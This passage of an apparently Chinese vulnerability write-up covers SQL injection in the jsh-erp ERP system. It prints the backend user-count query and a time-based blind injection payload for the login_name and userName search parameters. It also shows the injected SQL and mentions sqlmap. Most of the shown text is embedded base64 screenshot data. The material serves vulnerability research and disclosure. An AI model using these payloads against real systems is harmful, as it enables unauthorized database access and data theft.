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
<p>抓包</p>
<p><a id=img7 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233059-e6756198-c116-1.png><img src="data:image/png;base64,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
<p>这里的search参数包含了userName和loginName参数后端的SQL语句如下</p>
<p>IDcom.jsh.erp.datasource.mappers.UserMapperEx.countsByUser</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>count</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_user</span> <span class=k>user</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_user_business</span> <span class=n>ub</span> <span class=k>ON</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>ub</span><span class=p>.</span><span class=n>key_id</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_orga_user_rel</span> <span class=n>rel</span> <span class=k>ON</span> <span class=n>rel</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>rel</span><span class=p>.</span><span class=n>user_id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>rel</span><span class=p>.</span><span class=n>delete_flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_organization</span> <span class=n>org</span> <span class=k>ON</span> <span class=n>org</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>rel</span><span class=p>.</span><span class=n>orga_id</span> <span class=o>=</span> <span class=n>org</span><span class=p>.</span><span class=n>id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>org</span><span class=p>.</span><span class=n>org_stcd</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'5'</span> <span class=k>WHERE</span> <span class=k>user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>status</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=k>NOT</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'1'</span><span class=p>,</span> <span class=s1>'2'</span><span class=p>)</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>login_name</span> <span class=k>LIKE</span> <span class=s1>'%jsh%'</span>
</pre></div>
<p>按照该SQL语句在login_name构造布尔盲注的payload<code>%'/**/And/**/SleeP(3)--</code></p>
<p><a id=img8 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233113-ee9c6600-c116-1.png><img src="data:image/png;base64,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
<p>根据响应时间成功得到此处存在SQL注入</p>
<p>对应的SQL语句</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>count</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_user</span> <span class=k>user</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_user_business</span> <span class=n>ub</span> <span class=k>ON</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>ub</span><span class=p>.</span><span class=n>key_id</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_orga_user_rel</span> <span class=n>rel</span> <span class=k>ON</span> <span class=n>rel</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>rel</span><span class=p>.</span><span class=n>user_id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>rel</span><span class=p>.</span><span class=n>delete_flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_organization</span> <span class=n>org</span> <span class=k>ON</span> <span class=n>org</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>rel</span><span class=p>.</span><span class=n>orga_id</span> <span class=o>=</span> <span class=n>org</span><span class=p>.</span><span class=n>id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>org</span><span class=p>.</span><span class=n>org_stcd</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'5'</span> <span class=k>WHERE</span> <span class=k>user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>status</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=k>NOT</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'1'</span><span class=p>,</span> <span class=s1>'2'</span><span class=p>)</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>username</span> <span class=k>LIKE</span> <span class=s1>'%%'</span> <span class=k>AND</span> <span class=n>SleeP</span><span class=p>(</span><span class=mi>3</span><span class=p>)</span>
</pre></div>
<p>接下来使用sqlmap跑就ok了同样在userName参数也是一样的问题</p>
<h3 id=toc-9>注入点2</h3>
<h4>分析</h4>
<p>关注一个没有like匹配的</p>
<p><a id=img9 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233128-f7b3d6d8-c116-1.png><img src="data:image/png;base64,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